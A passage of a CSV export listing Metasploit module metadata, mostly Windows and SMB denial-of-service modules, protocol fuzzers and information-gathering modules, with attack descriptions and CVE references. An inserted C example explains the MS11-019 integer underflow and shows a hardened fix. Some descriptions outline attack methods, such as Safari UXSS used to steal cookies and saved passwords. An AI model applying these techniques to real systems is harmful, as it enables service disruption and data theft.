This requires that Active Server Pages are hosted by IIS and that an ASP script reads a POST form value.","Metasploit Framework License (BSD)","f","2010-09-14 00:00:00",,,"aggressive","t","CVE-2010-1899, EDB-15167, MSB-MS10-065, OSVDB-67978","Alligator Security Team, Heyder Andrade , Leandro Oliveira " 1275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/http/pi3web_isapi.rb","auxiliary","dos/windows/http/pi3web_isapi","auxiliary/dos/windows/http/pi3web_isapi","Pi3Web <=2.0.13 ISAPI DoS",300,"The Pi3Web HTTP server crashes when a request is made for an invalid DLL file in /isapi. By default, the non-DLLs in this directory after installation are users.txt, install.daf and readme.daf.","Metasploit Framework License (BSD)","f","2008-11-13 00:00:00",,,"aggressive","t","CVE-2008-6938, EDB-7109, OSVDB-49998","kris katterjohn " 1276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb","auxiliary","dos/windows/llmnr/ms11_030_dnsapi","auxiliary/dos/windows/llmnr/ms11_030_dnsapi","Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS",300,"This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll as distributed with Windows Vista and later without KB2509553. By sending a specially crafted LLMNR query containing a leading '.' character, an attacker can trigger stack exhaustion or potentially cause stack memory corruption. Although this vulnerability may lead to code execution, it has not been proven to be possible at the time of this writing. NOTE: In some circumstances, a '.' may be found before the top of the stack is reached. 
In these cases, this module may not be able to cause a crash.","Metasploit Framework License (BSD)","f","2011-04-12 00:00:00",,,"aggressive","t","CVE-2011-0657, MSB-MS11-030, OSVDB-71780","jduck " 1277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/nat/nat_helper.rb","auxiliary","dos/windows/nat/nat_helper","auxiliary/dos/windows/nat/nat_helper","Microsoft Windows NAT Helper Denial of Service",300,"This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP.","Metasploit Framework License (BSD)","f","2006-10-26 00:00:00",,,"aggressive","t","BID-20804, CVE-2006-5614, OSVDB-30096","MC " 1278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb","auxiliary","dos/windows/rdp/ms12_020_maxchannelids","auxiliary/dos/windows/rdp/ms12_020_maxchannelids","MS12-020 Microsoft Remote Desktop Use-After-Free DoS",300,"This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. 
The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which results in an invalid pointer being used, causing a denial-of-service condition.","Metasploit Framework License (BSD)","f","2012-03-16 00:00:00",,,"aggressive","t","CVE-2012-0002, EDB-18606, MSB-MS12-020, URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw, URL-http://pastie.org/private/feg8du0e9kfagng4rrg, URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html, URL-http://www.privatepaste.com/ffe875e04a, URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update","#ms12-020, Alex Ionescu, Daniel Godas-Lopez, Luigi Auriemma, jduck " 1279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb","auxiliary","dos/windows/smb/ms05_047_pnp","auxiliary/dos/windows/smb/ms05_047_pnp","Microsoft Plug and Play Service Registry Overflow",300,"This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the services.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-15065, CVE-2005-2120, MSB-MS05-047, OSVDB-18830","hdm " 1280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb","auxiliary","dos/windows/smb/ms06_035_mailslot","auxiliary/dos/windows/smb/ms06_035_mailslot","Microsoft SRV.SYS Mailslot Write Corruption",300,"This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. 
The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to ""\xff\xff"" (a short integer with value of -1).","Metasploit Framework License (BSD)","f","2006-07-11 00:00:00",,"Attack","aggressive","t","BID-19215, CVE-2006-3942, MSB-MS06-035, OSVDB-27644, URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10","hdm " 1281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb","auxiliary","dos/windows/smb/ms06_063_trans","auxiliary/dos/windows/smb/ms06_063_trans","Microsoft SRV.SYS Pipe Transaction No Null",300,"This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-19215, CVE-2006-3942, MSB-MS06-063, OSVDB-27644","hdm " 1282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_001_write.rb","auxiliary","dos/windows/smb/ms09_001_write","auxiliary/dos/windows/smb/ms09_001_write","Microsoft SRV.SYS WriteAndX Invalid DataOffset",300,"This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. 
This module has been tested successfully against Windows Vista.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-31179, CVE-2008-4114, MSB-MS09-001, OSVDB-48153","j.v.vallejo " 1283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb","auxiliary","dos/windows/smb/ms09_050_smb2_negotiate_pidhigh","auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh","Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",300,"This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36299, CVE-2009-3103, MSB-MS09-050, OSVDB-57799, URL-http://seclists.org/fulldisclosure/2009/Sep/0039.html, URL-http://www.microsoft.com/technet/security/advisory/975497.mspx","Laurent Gaffie , hdm " 1284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb","auxiliary","dos/windows/smb/ms09_050_smb2_session_logoff","auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff","Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference",300,"This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. 
Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2009-3103, MSB-MS09-050, OSVDB-57799","sf " 1285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb","auxiliary","dos/windows/smb/ms10_006_negotiate_response_loop","auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop","Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop",300,"This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0017, MSB-MS10-006, OSVDB-62244, URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html","Laurent Gaffie , hdm " 1286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb","auxiliary","dos/windows/smb/ms10_054_queryfs_pool_overflow","auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow","Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS",300,"This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows prior to the August 2010 Patch Tuesday. To trigger this bug, you must be able to access a share with at least read privileges. That generally means you will need authentication. 
However, if a system has a guest accessible share, you can trigger it without any authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-2550, MSB-MS10-054, OSVDB-66974, URL-http://seclists.org/fulldisclosure/2010/Aug/122","Laurent Gaffie , jduck " 1287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb","auxiliary","dos/windows/smb/ms11_019_electbowser","auxiliary/dos/windows/smb/ms11_019_electbowser","Microsoft Windows Browser Pool DoS",0,"This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows Server 2003 that have been configured as a domain controller. By sending a specially crafted election request, an attacker can cause a pool overflow. The vulnerability appears to be due to an error handling a length value while calculating the amount of memory to copy to a buffer. When there are zero bytes left in the buffer, the length value is improperly decremented and an integer underflow occurs. The resulting value is used in several calculations and is then passed as the length value to an inline memcpy operation. Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and causes considerable damage to kernel heap memory. 
While theoretically possible, it does not appear to be trivial to turn this vulnerability into remote (or even local) code execution.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-46360, CVE-2011-0654, EDB-16166, MSB-MS11-019, OSVDB-70881, URL-http://seclists.org/fulldisclosure/2011/Feb/285","Cupidon-3005, jduck " 1288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb","auxiliary","dos/windows/smb/rras_vls_null_deref","auxiliary/dos/windows/smb/rras_vls_null_deref","Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference",300,"This module triggers a NULL dereference in svchost.exe on all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP SP1 (using the SRVSVC pipe).","Metasploit Framework License (BSD)","f","2006-06-14 00:00:00",,"Attack","aggressive","t","OSVDB-64340","hdm " 1289,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb","auxiliary","dos/windows/smb/vista_negotiate_stop","auxiliary/dos/windows/smb/vista_negotiate_stop","Microsoft Vista SP0 SMB Negotiate Protocol DoS",300,"This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. 
This vulnerability was silently fixed in Microsoft Vista Service Pack 1.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-64341","hdm " 1290,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb","auxiliary","dos/windows/smtp/ms06_019_exchange","auxiliary/dos/windows/smtp/ms06_019_exchange","MS06-019 Exchange MODPROP Heap Overflow",300,"This module triggers a heap overflow vulnerability in MS Exchange that occurs when multiple malformed MODPROP values occur in a VCAL request.","Metasploit Framework License (BSD)","f","2004-11-12 00:00:00",,,"aggressive","t","BID-17908, CVE-2006-0027, MSB-MS06-019","pusscat " 1291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb","auxiliary","dos/windows/ssh/sysax_sshd_kexchange","auxiliary/dos/windows/ssh/sysax_sshd_kexchange","Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service",300,"This module sends a specially-crafted SSH Key Exchange causing the service to crash.","Metasploit Framework License (BSD)","f","2013-03-17 00:00:00",,,"aggressive","t","OSVDB-92081, URL-http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html","Matt ""hostess"" Andreko " 1292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/tftp/pt360_write.rb","auxiliary","dos/windows/tftp/pt360_write","auxiliary/dos/windows/tftp/pt360_write","PacketTrap TFTP Server 2.2.5459.0 DoS",300,"The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request.","Metasploit Framework License (BSD)","f","2008-10-29 00:00:00",,,"aggressive","t","CVE-2008-1311, EDB-6863, OSVDB-42932","kris katterjohn " 1293,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/tftp/solarwinds.rb","auxiliary","dos/windows/tftp/solarwinds","auxiliary/dos/windows/tftp/solarwinds","SolarWinds TFTP Server 10.4.0.10 Denial of Service",300,"The 
SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name.","Metasploit Framework License (BSD)","f","2010-05-21 00:00:00",,,"aggressive","t","CVE-2010-2115, EDB-12683, OSVDB-64845","Nullthreat" 1294,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/chunked.rb","auxiliary","dos/wireshark/chunked","auxiliary/dos/wireshark/chunked","Wireshark chunked_encoding_dissector function DOS",300,"Wireshark crashes when dissecting an HTTP chunked response. Versions affected: 0.99.5 (Bug 1394)","Metasploit Framework License (BSD)","f","2007-02-22 00:00:00",,,"aggressive","t","CVE-2007-3389, OSVDB-37643, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394","Matteo Cantoni " 1295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/cldap.rb","auxiliary","dos/wireshark/cldap","auxiliary/dos/wireshark/cldap","Wireshark CLDAP Dissector DOS",300,"This module causes infinite recursion to occur within the CLDAP dissector by sending a specially crafted UDP packet.","Metasploit Framework License (BSD)","f","2011-03-01 00:00:00",,,"aggressive","t","CVE-2011-1140, OSVDB-71552, URL-http://www.wireshark.org/security/wnpa-sec-2011-04.html, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717","joernchen (Phenoelit)" 1296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wireshark/ldap.rb","auxiliary","dos/wireshark/ldap","auxiliary/dos/wireshark/ldap","Wireshark LDAP dissector DOS",300,"The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet.","Metasploit Framework License (BSD)","f","2008-03-28 00:00:00",,,"aggressive","t","CVE-2008-1562, OSVDB-43840","MC " 1297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb","auxiliary","fuzzers/dns/dns_fuzzer","auxiliary/fuzzers/dns/dns_fuzzer","DNS and 
DNSSEC Fuzzer",300,"This module will connect to a DNS server and perform DNS and DNSSEC protocol-level fuzzing. Note that this module may inadvertently crash the target server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello " 1298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ftp/client_ftp.rb","auxiliary","fuzzers/ftp/client_ftp","auxiliary/fuzzers/ftp/client_ftp","Simple FTP Client Fuzzer",300,"This module will run an FTP server and fuzz the FTP client that connects to it.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 1299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb","auxiliary","fuzzers/ftp/ftp_pre_post","auxiliary/fuzzers/ftp/ftp_pre_post","Simple FTP Fuzzer",300,"This module will connect to an FTP server and perform pre- and post-authentication fuzzing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"corelanc0d3r , jduck " 1300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_form_field.rb","auxiliary","fuzzers/http/http_form_field","auxiliary/fuzzers/http/http_form_field","HTTP Form Field Fuzzer",300,"This module will grab all fields from a form, and launch a series of POST actions, fuzzing the contents of the form fields. 
You can optionally fuzz headers too (this option is enabled by default).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer","Paulino Calderon , corelanc0d3r" 1301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_get_uri_long.rb","auxiliary","fuzzers/http/http_get_uri_long","auxiliary/fuzzers/http/http_get_uri_long","HTTP GET Request URI Fuzzer (Incrementing Lengths)",300,"This module sends a series of HTTP GET requests with incrementing URL lengths.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nullthreat" 1302,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb","auxiliary","fuzzers/http/http_get_uri_strings","auxiliary/fuzzers/http/http_get_uri_strings","HTTP GET Request URI Fuzzer (Fuzzer Strings)",300,"This module sends a series of HTTP GET requests with malicious URIs.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nullthreat" 1303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb","auxiliary","fuzzers/smb/smb2_negotiate_corrupt","auxiliary/fuzzers/smb/smb2_negotiate_corrupt","SMB Negotiate SMB2 Dialect Corruption",300,"This module sends a series of SMB negotiate requests that advertise an SMB2 dialect with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb","auxiliary","fuzzers/smb/smb_create_pipe","auxiliary/fuzzers/smb/smb_create_pipe","SMB Create Pipe Request Fuzzer",300,"This module sends a series of SMB create pipe requests using malicious strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1305,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb","auxiliary","fuzzers/smb/smb_create_pipe_corrupt","auxiliary/fuzzers/smb/smb_create_pipe_corrupt","SMB Create Pipe Request Corruption",300,"This module sends a series of SMB create pipe requests with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb","auxiliary","fuzzers/smb/smb_negotiate_corrupt","auxiliary/fuzzers/smb/smb_negotiate_corrupt","SMB Negotiate Dialect Corruption",300,"This module sends a series of SMB negotiate requests with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb","auxiliary","fuzzers/smb/smb_ntlm1_login_corrupt","auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt","SMB NTLMv1 Login Request Corruption",300,"This module sends a series of SMB login requests using the NTLMv1 protocol with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb","auxiliary","fuzzers/smb/smb_tree_connect","auxiliary/fuzzers/smb/smb_tree_connect","SMB Tree Connect Request Fuzzer",300,"This module sends a series of SMB tree connect requests using malicious strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb","auxiliary","fuzzers/smb/smb_tree_connect_corrupt","auxiliary/fuzzers/smb/smb_tree_connect_corrupt","SMB Tree Connect Request Corruption",300,"This module sends a series of SMB tree connect requests with corrupted bytes.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 
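The ms11_019_electbowser entry above (Microsoft Windows Browser Pool DoS) describes one arithmetic mistake: a copy length derived from the bytes remaining in the election request is decremented without first checking that any bytes remain, so an unsigned counter wraps to 0xfffffffe and that value reaches an inline memcpy. The block below is a constructed illustration of that bug class, added here as an example; it is not code from browser.sys, from Microsoft, or from the Metasploit module, and the trailer size of 2 is an assumption chosen only to reproduce the -2 the description reports. It shows the wrapping computation beside a hardened version that validates before subtracting and bounds the copy by the destination size.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed illustration of the integer-underflow-to-memcpy pattern
 * described for MS11-019. Not browser.sys and not Metasploit code; the
 * trailer size of 2 is an assumption chosen to reproduce the reported
 * length of -2 (0xfffffffe) when no bytes remain.
 */
#define TRAILER_LEN 2u

/* Vulnerable length derivation: strips the trailer from "bytes remaining"
 * with no check that 'remaining' is at least TRAILER_LEN. With unsigned
 * arithmetic, remaining == 0 yields 0xfffffffe, the value the description
 * says ends up in the inline memcpy. */
uint32_t vuln_copy_len(uint32_t remaining)
{
    uint32_t len = remaining;
    len -= TRAILER_LEN;              /* wraps when remaining < 2 */
    return len;
}

/* Would the vulnerable path hand memcpy a length larger than the
 * destination? The memcpy itself is never performed here. */
bool vuln_would_overflow(uint32_t remaining, size_t dst_size)
{
    return vuln_copy_len(remaining) > dst_size;
}

/* Hardened version: check before subtracting, bound the copy by the
 * destination, and refuse rather than guess when the packet is short. */
bool safe_copy_field(uint8_t *dst, size_t dst_size,
                     const uint8_t *src, uint32_t remaining, size_t *out_len)
{
    if (remaining < TRAILER_LEN)     /* nothing left: reject, do not wrap */
        return false;
    uint32_t len = remaining - TRAILER_LEN;
    if (len > dst_size)              /* would overrun the destination */
        return false;
    memcpy(dst, src, len);
    *out_len = len;
    return true;
}

/* Self-contained checks over a constructed 10-byte field. Each returns
 * true when the behaviour matches what the description predicts. */
bool demo_hardened_rejects_empty(void)
{
    uint8_t dst[64];
    size_t n = 0;
    const uint8_t src[10] = {0};     /* constructed sample input */
    return safe_copy_field(dst, sizeof dst, src, 0, &n) == false;
}

bool demo_hardened_copies_payload(void)
{
    uint8_t dst[64];
    size_t n = 0;
    /* constructed sample: 8 payload bytes followed by a 2-byte trailer */
    const uint8_t src[10] = {1, 2, 3, 4, 5, 6, 7, 8, 0xff, 0xff};
    if (!safe_copy_field(dst, sizeof dst, src, sizeof src, &n))
        return false;
    return n == 8 && dst[0] == 1 && dst[7] == 8;
}

int main(void)
{
    printf("vuln length for 0 remaining bytes: 0x%08x\n",
           (unsigned)vuln_copy_len(0));
    printf("vuln path would overflow a 64-byte buffer: %s\n",
           vuln_would_overflow(0, 64) ? "yes" : "no");
    printf("hardened path rejects empty field: %s\n",
           demo_hardened_rejects_empty() ? "yes" : "no");
    printf("hardened path copies 8-byte payload: %s\n",
           demo_hardened_copies_payload() ? "yes" : "no");
    return 0;
}
```

The point of the hardened version is the order of operations: the bound check happens on the untrusted input before any subtraction, so the wrapped value can never be produced, and the copy length is additionally capped by the real destination size rather than trusted from the packet.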
1310,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb","auxiliary","fuzzers/smtp/smtp_fuzzer","auxiliary/fuzzers/smtp/smtp_fuzzer","SMTP Simple Fuzzer",300,"SMTP Simple Fuzzer","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc2821.txt","justme" 1311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb","auxiliary","fuzzers/ssh/ssh_kexinit_corrupt","auxiliary/fuzzers/ssh/ssh_kexinit_corrupt","SSH Key Exchange Init Corruption",300,"This module sends a series of SSH requests with a corrupted initial key exchange payload.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1312,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb","auxiliary","fuzzers/ssh/ssh_version_15","auxiliary/fuzzers/ssh/ssh_version_15","SSH 1.5 Version Fuzzer",300,"This module sends a series of SSH requests with malicious version strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb","auxiliary","fuzzers/ssh/ssh_version_2","auxiliary/fuzzers/ssh/ssh_version_2","SSH 2.0 Version Fuzzer",300,"This module sends a series of SSH requests with malicious version strings.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb","auxiliary","fuzzers/ssh/ssh_version_corrupt","auxiliary/fuzzers/ssh/ssh_version_corrupt","SSH Version Corruption",300,"This module sends a series of SSH requests with a corrupted version string","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1315,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb","auxiliary","fuzzers/tds/tds_login_corrupt","auxiliary/fuzzers/tds/tds_login_corrupt","TDS Protocol Login Request Corruption Fuzzer",300,"This module sends a series of malformed TDS login requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/tds/tds_login_username.rb","auxiliary","fuzzers/tds/tds_login_username","auxiliary/fuzzers/tds/tds_login_username","TDS Protocol Login Request Username Fuzzer",300,"This module sends a series of malformed TDS login requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb","auxiliary","fuzzers/wifi/fuzz_beacon","auxiliary/fuzzers/wifi/fuzz_beacon","Wireless Beacon Frame Fuzzer",300,"This module sends out corrupted beacon frames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb","auxiliary","fuzzers/wifi/fuzz_proberesp","auxiliary/fuzzers/wifi/fuzz_proberesp","Wireless Probe Response Frame Fuzzer",300,"This module sends out corrupted probe response frames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/android_htmlfileprovider.rb","auxiliary","gather/android_htmlfileprovider","auxiliary/gather/android_htmlfileprovider","Android Content Provider File Disclosure",300,"This module exploits a cross-domain issue within the Android web browser to exfiltrate files from a vulnerable device.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Thomas Cannon, jduck " 1320,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb","auxiliary","gather/apple_safari_webarchive_uxss","auxiliary/gather/apple_safari_webarchive_uxss","Apple Safari .webarchive File Format UXSS",300,"This module exploits a security context vulnerability that is inherent in Safari's .webarchive file format. The format allows you to specify both domain and content, so we can run arbitrary script in the context of any domain. This allows us to steal cookies, file URLs, and saved passwords from any website we want -- in other words, it is a universal cross-site scripting vector (UXSS). On sites that link to cached javascripts, we can additionally poison user's browser cache and install keyloggers.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",,"WebServer","passive","t","URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format","joev" 1321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/checkpoint_hostname.rb","auxiliary","gather/checkpoint_hostname","auxiliary/gather/checkpoint_hostname","CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",300,"This module sends a query to the port 264/TCP on CheckPoint Firewall-1 firewalls to obtain the firewall name and management station (such as SmartCenter) name via a pre-authentication request. The string returned is the CheckPoint Internal CA CN for SmartCenter and the firewall host. 
Whilst considered ""public"" information, most installations use detailed hostnames which may help an attacker focus on compromising the SmartCenter host; on government, intelligence and military networks the hostname may also reveal the physical location and rack number of the device, unintentionally publishing it to the world.","Metasploit Framework License (BSD)","f","2011-12-14 00:00:00",,,"aggressive","t","URL-http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure, URL-https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360","patrick " 1322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/citrix_published_applications.rb","auxiliary","gather/citrix_published_applications","auxiliary/gather/citrix_published_applications","Citrix MetaFrame ICA Published Applications Scanner",300,"This module attempts to query a Citrix MetaFrame ICA server to obtain the list of published applications.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.securiteam.com/exploits/5CP0B1F80S.html","patrick " 1323,"2013-05-07 